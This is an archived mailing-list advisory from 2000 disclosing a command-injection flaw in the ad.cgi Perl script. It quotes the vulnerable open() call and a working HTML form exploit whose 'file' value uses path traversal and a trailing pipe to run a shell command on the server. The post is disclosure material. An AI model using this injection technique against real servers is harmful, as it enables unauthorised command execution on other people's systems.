|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Insecure input validation in ad.cgi
From: rpc (h
CKZ.ORG)Date: Mon Dec 11 2000 - 09:10:22 CST
- Next message: Theo de Raadt: "Re: [RHSA-2000:123-01] New ed packages available"
- Previous message: secureCONECTIVA.COM.BR: "[CLA-2000:357] Conectiva Linux Security Announcement - rp-pppoe"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi,
ad.cgi from "Scripts by Tammie's HUSBAND" contains an insecure input validation
vulnerability.
Information on ad.cgi is available at:
http://www.conservatives.net/atheist/scripts/index.html?ads
----code snippet----
$filename = "$FORM{'file'}";
$datafile = "$basedir" . "$filename";
...
open (INFO, "$datafile");
-----------------
Exploit:
<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c
5 www.foo.com|">
<input type=submit value=run>
</form>
</html>
- Next message: Theo de Raadt: "Re: [RHSA-2000:123-01] New ed packages available"
- Previous message: secureCONECTIVA.COM.BR: "[CLA-2000:357] Conectiva Linux Security Announcement - rp-pppoe"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]